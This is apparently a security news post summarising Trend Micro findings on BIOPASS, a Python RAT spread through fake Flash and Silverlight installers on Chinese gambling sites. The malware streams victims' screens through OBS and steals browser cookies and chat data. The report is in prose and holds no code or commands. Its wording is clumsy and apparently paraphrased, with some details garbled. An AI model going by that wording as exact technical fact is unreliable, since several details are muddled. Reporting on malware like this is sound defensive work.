Hackers Spread New BIOPASS Malware to Live Streams Victim’s Screen

Our researchers are alerting about a new malware that’s using online gambling organizations in China using a watering hole attack. Hackers deliver a new remote access malware (RAT) called BIOPASS that enable watching the victim’s computer screen in real-time by harming well-known streaming software and take advantage of Open Broadcaster Software (OBS) Studio’s to monitor the screen of its victims.

Except for the unusual feature, which comes on top of the common functions seen in RATs, the Trojan can also hijack crucial data from web browsers and instant messaging applications.

How it has been Actively Deployed?

The users of the Python-based BIOPASS seem to target visitors of sites relating to online gambling in China. They insert the JavaScript code in the sites that serve the malware under the appearance of installers for Adobe Flash Player or Microsoft Silverlight installers.

At the end of 2020, Adobe provided Flash Player and block running Flash content since 12th January, insisting users remove the application due to high-security risks.

Silverlight pursues a similar way, with Microsoft ending support later this year, on 12th October. The structure is actively supported only on Internet Explorer 11 and there are no plans for increasing its life.

Security Investigators at Trend Micro discovered that the script fetching BIOPASS checks if the user who visits the site has been harmed and is directly inserted into the target site’s online support chat page.

Trend Micro states that “If the script confirms that the visitor has not yet been harmed, it will then replace the original page data with the threat actor’s own content. The new page will display an error message with an accompanying instruction telling website visitors to download either a Flash installer or a Silverlight installer, both of which are harmful loaders.”

The attacker is guarded enough to provide the appropriate installers for Flash Player and Silverlight, the application is downloaded from the official websites or preserved on the threat actor’s Alibaba cloud storage. 

BIOPASS remote access malware is preserved at the same place, along with the DLL and libraries important to run scripts of systems where Python language is not present.

The investigators note that the Trojan is currently set up and that the loader’s default payload was Cobalt Strike shellcode, not the BIOPASS RAT.


How are Attackers Streaming the Screen using Open-Source Software?

BIOPASS has all the functionalities typically available in remote access malware, such as going through the file system, file exfiltration, taking screenshots, remote desktop access, and running the shell command.

Although it also downloads FFmpeg that is needed to convert, record, convert and stream audio and video, as well as the Open Broadcaster Software, an open-source solution for live streaming and video solution.

The threat actor can use either of the two structures to observe a harmed system’s desktop and stream the video to the cloud, permitting them to watch the feed in real-time by logging into the BIOPASS control panel.

When examining the malware, the investigators discover a command that calculates installation folders for multiple messaging applications, WeChat, QQ, and Aliwangwang among them.

BIOPASS also quotes critical information – cookies and logins – from several web browsers (Google Chrome, Microsoft Edge Beta, QQ Browser, Sogou Explorer, 360 Safe Browser, and 360 Chrome).

While not implemented in the examined version, the investigator discovers a Python plugin that stole the chat history from the WeChat messenger for Windows.

Another plugin includes numerous Python scripts for harming web servers using a cross-site scripting (XSS) attack. This would permit the threat actor to insert their scripts in the response of the victim’s web browser, permitting the threat actor to handle JavaScript and HTML resources.


There is no specific aspect on who is behind this BIOPASS RAT but Trend Micro discover links targeting the Chinese Winnti hacker gang, also known as APT41.

Leave a Reply